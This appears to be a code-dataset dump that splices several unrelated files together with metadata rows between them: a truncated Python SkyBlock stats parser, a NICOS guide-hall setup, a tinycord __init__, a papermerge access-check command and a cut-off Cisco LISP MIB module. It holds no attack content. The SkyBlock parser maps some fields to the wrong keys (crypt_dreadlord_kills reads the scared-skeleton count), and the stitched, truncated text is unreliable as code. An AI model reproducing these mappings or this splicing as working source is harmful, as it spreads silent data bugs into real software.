'kills_dungeon_respawning_skeleton' in stats else None self.scared_skeleton_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None self.skeleton_grunt_kills = int(stats['kills_skeleton_grunt']) if 'kills_skeleton_grunt' in stats else None self.crypt_dreadlord_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None self.crypt_souleater_kills = int(stats['kills_crypt_souleater']) if 'kills_crypt_souleater' in stats else None self.crypt_tank_zombie_kills = int( stats['kills_crypt_tank_zombie']) if 'kills_crypt_tank_zombie' in stats else None self.diamond_guy_kills = int(stats['kills_diamond_guy']) if 'kills_diamond_guy' in stats else None self.zombie_grunt_kills = int(stats['kills_zombie_grunt']) if 'kills_zombie_grunt' in stats else None self.crypt_lurker_deaths = int(stats['deaths_crypt_lurker']) if 'deaths_crypt_lurker' in stats else None self.lost_adventurer_deaths = int( stats['deaths_lost_adventurer']) if 'deaths_lost_adventurer' in stats else None self.watcher_summon_undead_kills = int( stats['kills_watcher_summon_undead']) if 'kills_watcher_summon_undead' in stats else None self.skeleton_soldier_kills = int( stats['kills_skeleton_soldier']) if 'kills_skeleton_soldier' in stats else None self.diamond_guy_deaths = int(stats['deaths_diamond_guy']) if 'deaths_diamond_guy' in stats else None self.watcher_summon_undead_deaths = int( stats['deaths_watcher_summon_undead']) if 'deaths_watcher_summon_undead' in stats else None self.bonzo_summon_undead_kills = int( stats['kills_bonzo_summon_undead']) if 'kills_bonzo_summon_undead' in stats else None self.lost_adventurer_kills = int(stats['kills_lost_adventurer']) if 'kills_lost_adventurer' in stats else None self.skeleton_master_kills = int(stats['kills_skeleton_master']) if 'kills_skeleton_master' in stats else None self.sniper_skeleton_kills = int(stats['kills_sniper_skeleton']) if 'kills_sniper_skeleton' in stats else None 
self.skeleton_soldier_deaths = int( stats['deaths_skeleton_soldier']) if 'deaths_skeleton_soldier' in stats else None self.trap_deaths = int(stats['deaths_trap']) if 'deaths_trap' in stats else None self.crypt_undead_kills = int(stats['kills_crypt_undead']) if 'kills_crypt_undead' in stats else None self.skeleton_grunt_deaths = int(stats['deaths_skeleton_grunt']) if 'deaths_skeleton_grunt' in stats else None self.scarf_warrior_deaths = int(stats['deaths_scarf_warrior']) if 'deaths_scarf_warrior' in stats else None self.skeleton_master_deaths = int( stats['deaths_skeleton_master']) if 'deaths_skeleton_master' in stats else None self.blaze_higher_or_lower_kills = int( stats['kills_blaze_higher_or_lower']) if 'kills_blaze_higher_or_lower' in stats else None self.dungeon_respawning_skeleton_deaths = int( stats['deaths_dungeon_respawning_skeleton']) if 'deaths_dungeon_respawning_skeleton' in stats else None self.scarf_deaths = int(stats['deaths_scarf']) if 'deaths_scarf' in stats else None self.bonzo_summon_undead_deaths = int( stats['deaths_bonzo_summon_undead']) if 'deaths_bonzo_summon_undead' in stats else None self.bonzo_deaths = int(stats['deaths_bonzo']) if 'deaths_bonzo' in stats else None self.lonely_spider_kills = int(stats['kills_lonely_spider']) if 'kills_lonely_spider' in stats else None self.parasite_kills = int(stats['kills_parasite']) if 'kills_parasite' in stats else None self.cellar_spider_kills = int(stats['kills_cellar_spiders']) if 'kills_cellar_spiders' in stats else None self.dungeon_secret_bat_kills = int( stats['kills_dungeon_secret_bat']) if 'kills_dungeon_secret_bat' in stats else None self.scarf_mage_kills = int(stats['kills_scarf_mage']) if 'kills_scarf_mage' in stats else None self.crypt_undead_friedrich_kills = int( stats['kills_crypt_undead_friedrich']) if 'kills_crypt_undead_friedrich' in stats else None self.guardian_defender_kills = int( stats['kills_guardian_defender']) if 'kills_guardian_defender' in stats else None 
self.crypt_dreadlord_deaths = int( stats['deaths_crypt_dreadlord']) if 'deaths_crypt_dreadlord' in stats else None self.zombie_soldier_kills = int(stats['kills_zombie_soldier']) if 'kills_zombie_soldier' in stats else None self.skeletor_deaths = int(stats['deaths_skeletor']) if 'deaths_skeletor' in stats else None self.skeletor_kills = int(stats['kills_skeletor']) if 'kills_skeletor' in stats else None self.professer_mage_guardian_deaths = int( stats['deaths_professor_mage_guardian']) if 'deaths_professor_mage_guardian' in stats else None self.sea_leech_kills = int(stats['kills_sea_leech']) if 'kills_sea_leech' in stats else None self.sea_witch_kills = int(stats['kills_sea_witch']) if 'kills_sea_witch' in stats else None self.skeleton_emperor_kills = int( stats['kills_skeleton_emperor']) if 'kills_skeleton_emperor' in stats else None self.mythos_burrows_dug_next = int( stats['mythos_burrows_dug_next']) if 'mythos_burrows_dug_next' in stats else None self.common_mythos_burrows_dug_next = int( stats['mythos_burrows_dug_next_COMMON']) if 'mythos_burrows_dug_next_COMMON' in stats else None self.mythos_burrows_dug_combat = int( stats['mythos_burrows_dug_combat']) if 'mythos_burrows_dug_combat' in stats else None self.common_mythos_burrows_dug_combat = int( stats['mythos_burrows_dug_combat_COMMON']) if 'mythos_burrows_dug_combat_COMMON' in stats else None self.mythos_kills = int(stats['kills_mythos']) if 'kills_mythos' in stats else None self.minos_hunter_kills = int(stats['kills_minos_hunter']) if 'kills_minos_hunter' in stats else None self.mythos_burrows_dug_treasure = int( stats['mythos_burrows_dug_treasure']) if 'mythos_burrows_dug_treasure' in stats else None self.common_mythos_burrows_dug_treasure = int( stats['mythos_burrows_dug_treasure_COMMON']) if 'mythos_burrows_dug_treasure_COMMON' in stats else None self.siamese_lynx_kills = int(stats['kills_siamese_lynx']) if 'kills_siamese_lynx' in stats else None self.mythos_burrows_chains_complete = int( 
stats['mythos_burrows_chains_complete']) if 'mythos_burrows_chains_complete' in stats else None self.common_mythos_burrows_chains_complete = int(stats['mythos_burrows_chains_complete_COMMON'] ) if 'mythos_burrows_chains_complete_COMMON' in stats else None self.rare_mythos_burrows_dug_next = int( stats['mythos_burrows_dug_next_RARE']) if 'mythos_burrows_dug_next_RARE' in stats else None self.rare_mythos_burrows_dug_combat = int( stats['mythos_burrows_dug_combat_RARE']) if 'mythos_burrows_dug_combat_RARE' in stats else None self.minotaur_deaths = int(stats['deaths_minotaur']) if 'deaths_minotaur' in stats else None self.minotaur_kills = int(stats['kills_minotaur']) if 'kills_minotaur' in stats else None self.gaia_construct_kills = int(stats['kills_gaia_construct']) if 'kills_gaia_construct' in stats else None self.rare_mythos_burrows_dug_treasure = int( stats['mythos_burrows_dug_treasure_RARE']) if 'mythos_burrows_dug_treasure_RARE' in stats else None self.rare_mythos_burrows_chains_complete = int( stats['mythos_burrows_chains_complete_RARE']) if 'mythos_burrows_chains_complete_RARE' in stats else None self.gaia_construct_deaths = int(stats['deaths_gaia_construct']) if 'deaths_gaia_construct' in stats else None self.siamese_lynx_deaths = int(stats['deaths_siamese_lynx']) if 'deaths_siamese_lynx' in stats else None self.deep_sea_protector_kills = int( stats['kills_deep_sea_protector']) if 'kills_deep_sea_protector' in stats else None self.water_hydra_kills = int(stats['kills_water_hydra']) if 'kills_water_hydra' in stats else None self.blue_shark_kills = int(stats['kills_blue_shark']) if 'kills_blue_shark' in stats else None self.tiger_shark_kills = int(stats['kills_tiger_shark']) if 'kills_tiger_shark' in stats else None self.nurse_shark_kills = int(stats['kills_nurse_shark']) if 'kills_nurse_shark' in stats else None self.crypt_souleater_deaths = int( stats['deaths_crypt_souleater']) if 'deaths_crypt_souleater' in stats else None self.zombie_knight_kills = 
int(stats['kills_zombie_knight']) if 'kills_zombie_knight' in stats else None self.crypt_undead_valentin_kills = int( stats['kills_crypt_undead_valentin']) if 'kills_crypt_undead_valentin' in stats else None self.soul_of_the_alpha_deaths = int( stats['deaths_soul_of_the_alpha']) if 'deaths_soul_of_the_alpha' in stats else None self.dungeon_hub_precursor_ruins_no_abilities_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_no_abilities_no_return_best_time'] self.crypt_wither_skeleton_kills = int( stats['kills_crypt_witherskeleton']) if 'kills_crypt_witherskeleton' in stats else None self.crypt_wither_skeleton_deaths = int( stats['deaths_crypt_witherskeleton']) if 'deaths_crypt_witherskeleton' in stats else None self.spirit_wolf_kills = int(stats['kills_spirit_wolf']) if 'kills_spirit_wolf' in stats else None self.spirit_sheep_kills = int(stats['kills_spirit_sheep']) if 'kills_spirit_sheep' in stats else None self.spirit_bull_kills = int(stats['kills_spirit_bull']) if 'kills_spirit_bull' in stats else None self.spirit_rabbit_kills = int(stats['kills_spirit_rabbit']) if 'kills_spirit_rabbit' in stats else None self.thork_kills = int(stats['kills_thorn']) if 'kills_thorn' in stats else None self.livid_clone_deaths = int(stats['deaths_livid_clone']) if 'deaths_livid_clone' in stats else None self.sniper_skeleton_deaths = int( stats['deaths_sniper_skeleton']) if 'deaths_sniper_skeleton' in stats else None self.super_tank_zombie_kills = int( stats['kills_super_tank_zombie']) if 'kills_super_tank_zombie' in stats else None self.super_archer_kills = int(stats['kills_super_archer']) if 'kills_super_archer' in stats else None self.tentaclees_deaths = int(stats['deaths_tentaclees']) if 'deaths_tentaclees' in stats else None self.corrupted_protector_kills = int( stats['kills_corrupted_protector']) if 'kills_corrupted_protector' in stats else None self.professer_guardian_summon_kills = int( stats['kills_professor_guardian_summon']) if 'kills_professor_guardian_summon' in 
stats else None self.unstable_dragon_kills = int(stats['kills_unstable_dragon']) if 'kills_unstable_dragon' in stats else None self.strong_dragon_kills = int(stats['kills_strong_dragon']) if 'kills_strong_dragon' in stats else None self.spirit_bat_kills = int(stats['kills_spirit_bat']) if 'kills_spirit_bat' in stats else None self.shadow_assassin_kills = int(stats['kills_shadow_assassin']) if 'kills_shadow_assassin' in stats else None self.tentaclees_kills = int(stats['kills_tentaclees']) if 'kills_tentaclees' in stats else None self.livid_deaths = int(stats['deaths_livid']) if 'deaths_livid' in stats else None self.sadan_statue_deaths = int(stats['deaths_sadan_statue']) if 'deaths_sadan_statue' in stats else None self.scary_jerry_kills = int(stats['kills_scary_jerry']) if 'kills_scary_jerry' in stats else None self.wither_gourd_kills = int(stats['kills_wither_gourd']) if 'kills_wither_gourd' in stats else None self.trick_or_treater_kills = int( stats['kills_trick_or_treater']) if 'kills_trick_or_treater' in stats else None self.phantom_spirit_kills = int(stats['kills_phantom_spirit']) if 'kills_phantom_spirit' in stats else None self.wraith_kills = int(stats['kills_wraith']) if 'kills_wraith' in stats else None self.batty_witch_kills = int(stats['kills_batty_witch']) if 'kills_batty_witch' in stats else None self.zombie_commander_kills = int( stats['kills_zombie_commander']) if 'kills_zombie_commander' in stats else None self.watcher_guardian_deaths = int( stats['deaths_watcher_guardian']) if 'deaths_watcher_guardian' in stats else None self.skeletor_prime_kills = int(stats['kills_skeletor_prime']) if 'kills_skeletor_prime' in stats else None self.super_tank_zombie_deaths = int( stats['deaths_super_tank_zombie']) if 'deaths_super_tank_zombie' in stats else None self.skeletor_prime_deaths = int(stats['deaths_skeletor_prime']) if 'deaths_skeletor_prime' in stats else None self.great_white_shark_kills = int( stats['kills_great_white_shark']) if 
'kills_great_white_shark' in stats else None self.zombie_knight_deaths = int(stats['deaths_zombie_knight']) if 'deaths_zombie_knight' in stats else None self.suffocation_deaths = int(stats['deaths_suffocation']) if 'deaths_suffocation' in stats else None self.protector_dragon_deaths = int( stats['deaths_protector_dragon']) if 'deaths_protector_dragon' in stats else None self.sadan_deaths = int(stats['deaths_sadan']) if 'deaths_sadan' in stats else None self.sadan_golem_deaths = int(stats['deaths_sadan_golem']) if 'deaths_sadan_golem' in stats else None self.watcher_scarf_deaths = int(stats['deaths_watcher_scarf']) if 'deaths_watcher_scarf' in stats else None self.scarf_warrior_kills = int(stats['kills_scarf_warrior']) if 'kills_scarf_warrior' in stats else None self.crypt_undead_deaths = int(stats['deaths_crypt_undead']) if 'deaths_crypt_undead' in stats else None self.watcher_scarf_kills = int(stats['kills_watcher_scarf']) if 'kills_watcher_scarf' in stats else None self.spirit_bat_deaths = int(stats['deaths_spirit_bat']) if 'deaths_spirit_bat' in stats else None self.spirit_miniboss_deaths = int( stats['deaths_spirit_miniboss']) if 'deaths_spirit_miniboss' in stats else None self.spirit_chicken_deaths = int(stats['deaths_spirit_chicken']) if 'deaths_spirit_chicken' in stats else None self.spirit_sheep_deaths = int(stats['deaths_spirit_sheep']) if 'deaths_spirit_sheep' in stats else None self.crypt_undead_marius_kills = int( stats['kills_crypt_undead_marius']) if 'kills_crypt_undead_marius' in stats else None class SkyBlockObjective(object): r"""Represents a SkyBlock Objective. :param objective_name: The name of the objective. :type objective_name: str :param objective_data: The objective's data. 
:type objective_data: dict""" def __init__(self, objective_name: str, objective_data: dict): self.name = objective_name self.status = objective_data['status'] self.progress = objective_data['progress'] self.completed_at = datetime.datetime.fromtimestamp( objective_data['completed_at'] / 1000 ) if objective_data['completed_at'] != 0 else None class SkyBlockQuest(object): r"""Represents a SkyBlock quest. :param quest_name: The name of the quest. :type quest_name: str :param quest_data: The quest's data. :type quest_data: dict""" def __init__(self, quest_name: str, quest_data: dict): self.name = quest_name self.status = quest_data['status'] self.activated_at = datetime.datetime.fromtimestamp( quest_data['activated_at'] / 1000 ) self.completed_at = datetime.datetime.fromtimestamp( quest_data['completed_at'] / 1000 ) class SkyBlockSlayer(object): r"""Represents a SkyBlock slayer. :param slayer: The name of the slayer. :type slayer: str :param slayer_data: The slayer's data. :type slayer_data: dict""" def __init__(self, slayer: str, slayer_data: dict): self.slayer = slayer self.claimed_levels = slayer_data['claimed_levels'] self.xp = slayer_data['xp'] self.level = types[slayer](slayer_data['xp']) class SkyBlockPet(object): r"""Represents a SkyBlock pet. :param pet_data: The pet's data. :type pet_data: dict""" def __init__(self, pet_data: dict): self.uuid = pet_data['uuid'] self.type = pet_data['type'] self.xp = pet_data['exp'] self.active = pet_data['active'] self.tier = pet_data['tier'] self.held_item = pet_data['heldItem'] self.candy_used = pet_data['candyUsed'] self.skin = pet_data['skin'] class SkyBlockSkill(object): r"""Represents a SkyBlock skill. :param name: The skill's name. :type name: str :param skill_data: The skill's data. :type skill_data: dict""" def __init__(self, name, skill_data): self.name = name self.level = skill_data['level'] self.xp = skill_data['xp']
73.955645
120
0.733684
5,198
36,682
4.825702
0.076953
0.084835
0.11621
0.158468
0.638056
0.462805
0.320722
0.147385
0.102256
0.063028
0
0.000735
0.184287
36,682
495
121
74.105051
0.837578
0.052832
0
0.004728
0
0
0.321464
0.185294
0
0
0
0
0
1
0.014184
false
0
0.004728
0
0.033097
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdba7af199ee6c2c990e85c3f998b299c41d4413
604
py
Python
nicos_virt_mlz/reseda/setups/guidehall.py
jkrueger1/nicos
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
[ "CC-BY-3.0", "Apache-2.0", "CC-BY-4.0" ]
12
2019-11-06T15:40:36.000Z
2022-01-01T16:23:00.000Z
nicos_virt_mlz/reseda/setups/guidehall.py
jkrueger1/nicos
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
[ "CC-BY-3.0", "Apache-2.0", "CC-BY-4.0" ]
91
2020-08-18T09:20:26.000Z
2022-02-01T11:07:14.000Z
nicos_virt_mlz/reseda/setups/guidehall.py
jkrueger1/nicos
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
[ "CC-BY-3.0", "Apache-2.0", "CC-BY-4.0" ]
6
2020-01-11T10:52:30.000Z
2022-02-25T12:35:23.000Z
# NICOS setup file: infrastructure devices of the FRM II neutron guide
# hall west. 'lowlevel' setups are loaded implicitly, not user-selectable.
description = 'FRM II Neutron guide hall west infrastructure devices'

group = 'lowlevel'

devices = dict(
    # Sixfold shutter: a manually switched two-state device.
    Sixfold = device('nicos.devices.generic.ManualSwitch',
        description = 'Sixfold shutter status',
        states = ('closed', 'open'),
        pollinterval = 60,
        maxage = 120,
    ),
    # Crane position along the hall, entered by hand; limited to the
    # 0-60 m span and displayed with one decimal.
    Crane = device('nicos.devices.generic.ManualMove',
        description = 'The position of the crane in the guide '
                      'hall West measured from the east end',
        abslimits = (0, 60),
        pollinterval = 5,
        maxage = 30,
        unit = 'm',
        fmtstr = '%.1f',
    ),
)
27.454545
69
0.584437
63
604
5.603175
0.698413
0.050992
0.073654
0.141643
0
0
0
0
0
0
0
0.028302
0.298013
604
21
70
28.761905
0.804245
0
0
0.105263
0
0
0.395695
0.109272
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbb22ba6b4c3c39c0c15a90a8c254569dd0c0be
74
py
Python
tinycord/models/message/gateway/__init__.py
tinycord/tinycord
9e817452c1f2357878f07f8622f6240687470cad
[ "MIT" ]
8
2022-01-08T20:04:29.000Z
2022-03-21T19:12:19.000Z
tinycord/models/message/gateway/__init__.py
tinycord/tinycord
9e817452c1f2357878f07f8622f6240687470cad
[ "MIT" ]
null
null
null
tinycord/models/message/gateway/__init__.py
tinycord/tinycord
9e817452c1f2357878f07f8622f6240687470cad
[ "MIT" ]
1
2022-01-02T21:42:53.000Z
2022-01-02T21:42:53.000Z
# Re-export the reaction gateway model so callers can import it from this
# package directly.
from .reaction import ReactionGateway

# Explicit public API of this package.
__all__ = [
    "ReactionGateway"
]
14.8
37
0.743243
6
74
8.5
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.175676
74
5
38
14.8
0.836066
0
0
0
0
0
0.2
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bdbb658871214d92211c98f23c493a5bef0ef8d6
2,366
py
Python
papermerge/core/management/commands/checkaccess.py
MinchinWeb/papermerge
8a5f73207413a3ea8989d277e140d448baa35ca4
[ "Apache-2.0" ]
null
null
null
papermerge/core/management/commands/checkaccess.py
MinchinWeb/papermerge
8a5f73207413a3ea8989d277e140d448baa35ca4
[ "Apache-2.0" ]
null
null
null
papermerge/core/management/commands/checkaccess.py
MinchinWeb/papermerge
8a5f73207413a3ea8989d277e140d448baa35ca4
[ "Apache-2.0" ]
null
null
null
import logging

try:
    from django_tenants.utils import get_tenant_model
except ImportError:
    # django_tenants is an optional dependency; keep the module importable
    # without it. (Narrowed from a bare ``except:``, which also swallowed
    # SystemExit/KeyboardInterrupt.)
    get_tenant_model = None

from django.core.management.base import BaseCommand, CommandError
from django.db import connection

from papermerge.core.models import (
    BaseTreeNode,
    Access
)
from papermerge.core.auth import (
    create_access_perms
)

logger = logging.getLogger(__name__)


class Command(BaseCommand):
    """Management command: list or repair Access models on tree nodes."""

    help = """Lists/Updates Access Models associated with nodes.
    """

    def add_arguments(self, parser):
        """Register the --count/--update/--schema-name CLI options."""
        parser.add_argument(
            '--count', '-c',
            action="store_true",
            help="Count nodes with/without associated access model."
        )
        parser.add_argument(
            '--update', '-u',
            action="store_true",
            help="Updated nodes without associated access model."
        )
        parser.add_argument(
            '--schema-name', '-s',
            help="Run checkaccess for this schema."
        )

    def run_count(self):
        """Print the total node count and how many nodes lack an Access row."""
        total_count = BaseTreeNode.objects.count()
        without_access_count = BaseTreeNode.objects.filter(
            access__isnull=True
        ).count()
        print(
            f"total={total_count}, without_access={without_access_count}"
        )

    def run_update(self):
        """Create a default 'allow' Access entry for every node missing one."""
        perms = create_access_perms()

        for node in BaseTreeNode.objects.all():
            if node.access_set.count() == 0:
                access = Access.objects.create(
                    user=node.user,
                    access_type='allow',
                    node=node
                )
                access.permissions.add(*perms)

    def handle(self, *args, **options):
        """Run count/update per tenant schema (all non-public by default).

        Raises CommandError when django_tenants is not installed.
        """
        count = options.get('count', False)
        update = options.get('update', False)
        schema_name = options.get('schema_name', False)

        # Bug fix: the original called get_tenant_model() unconditionally,
        # which raised TypeError ('NoneType' object is not callable) when
        # the optional django_tenants package was missing — defeating the
        # import fallback above. Fail with a clear command error instead.
        if get_tenant_model is None:
            raise CommandError(
                "django_tenants is not installed; "
                "checkaccess requires a multi-tenant setup."
            )

        TenantModel = get_tenant_model()

        if schema_name:
            tenant_list = TenantModel.objects.filter(name=schema_name)
        else:
            tenant_list = TenantModel.objects.exclude(name="public")

        for tenant in tenant_list:
            connection.set_tenant(tenant)
            if count:
                self.run_count()
            elif update:
                self.run_update()
24.645833
73
0.554522
235
2,366
5.395745
0.353191
0.039432
0.033123
0.029968
0.070978
0.070978
0.070978
0
0
0
0
0.000653
0.352494
2,366
95
74
24.905263
0.827024
0
0
0.113924
0
0
0.136517
0.015638
0
0
0
0
0
1
0.050633
false
0
0.075949
0
0.151899
0.012658
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbde2d938f424e96e16facd89ad398cdbed2930
46,214
py
Python
pysnmp-with-texts/CISCO-LISP-EXT-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
8
2019-05-09T17:04:00.000Z
2021-06-09T06:50:51.000Z
pysnmp-with-texts/CISCO-LISP-EXT-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
4
2019-05-31T16:42:59.000Z
2020-01-31T21:57:17.000Z
pysnmp-with-texts/CISCO-LISP-EXT-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module CISCO-LISP-EXT-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-LISP-EXT-MIB # Produced by pysmi-0.3.4 at Wed May 1 12:04:38 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") SingleValueConstraint, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion") ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt") AddressFamilyNumbers, = mibBuilder.importSymbols("IANA-ADDRESS-FAMILY-NUMBERS-MIB", "AddressFamilyNumbers") InetPortNumber, = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetPortNumber") lispMappingDatabaseTimeStamp, lispFeaturesMapCacheLimit, lispUseProxyEtrState, lispEidRegistrationSiteName, lispUseMapResolverState, lispFeaturesEntry, lispUseMapServerState, lispGlobalStatsEntry, LispAddressType = mibBuilder.importSymbols("LISP-MIB", "lispMappingDatabaseTimeStamp", "lispFeaturesMapCacheLimit", "lispUseProxyEtrState", "lispEidRegistrationSiteName", "lispUseMapResolverState", "lispFeaturesEntry", "lispUseMapServerState", "lispGlobalStatsEntry", "LispAddressType") NotificationGroup, ObjectGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ObjectGroup", "ModuleCompliance") Counter32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, ObjectIdentity, NotificationType, ModuleIdentity, MibIdentifier, iso, Counter64, Unsigned32, IpAddress, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "TimeTicks", "MibScalar", "MibTable", 
"MibTableRow", "MibTableColumn", "Bits", "ObjectIdentity", "NotificationType", "ModuleIdentity", "MibIdentifier", "iso", "Counter64", "Unsigned32", "IpAddress", "Integer32", "Gauge32") TextualConvention, TruthValue, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TruthValue", "TimeStamp", "DisplayString") ciscoLispExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 825)) ciscoLispExtMIB.setRevisions(('2015-05-13 00:00',)) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): if mibBuilder.loadTexts: ciscoLispExtMIB.setRevisionsDescriptions(('Initial version of the CISCO-LISP-EXT-MIB module.',)) if mibBuilder.loadTexts: ciscoLispExtMIB.setLastUpdated('201505130000Z') if mibBuilder.loadTexts: ciscoLispExtMIB.setOrganization('Cisco Systems, Inc.') if mibBuilder.loadTexts: ciscoLispExtMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: lisp-support@cisco.com') if mibBuilder.loadTexts: ciscoLispExtMIB.setDescription('This MIB is an extension to the IETF LISP-MIB module defined in RFC 7052. 
It contains Cisco defined managed objects and traps to support monitoring devices that support the Locator/ID Separation Protocol (LISP).') ciscoLispExtNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 0)) ciscoLispExtObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1)) ciscoLispExtConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2)) clispExtEidRegRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1), ) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setDescription('This table lists the RLOC address gleaned from the map-server registration database for the purpose of RLOC membership. Entry on this table can also be added from configuration.') clispExtEidRegRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRloc")) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setDescription('An entry describes an RLOC address gleaned from the map-server registration database.') clispExtEidRegRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC address.') clispExtEidRegRlocMembershipEidAfi = 
MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 2), AddressFamilyNumbers()) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC address.') clispExtEidRegRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC address.') clispExtEidRegRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 4), LispAddressType()) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setDescription('This object indicates the value of the RLOC address.') clispExtEidRegRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 5), TimeStamp()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when this RLOC address was registered. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.') clispExtEidRegRlocMembershipGleaned = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 6), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setDescription('This object indicates whether the RLOC address was gleaned from a received EID prefix registration. 
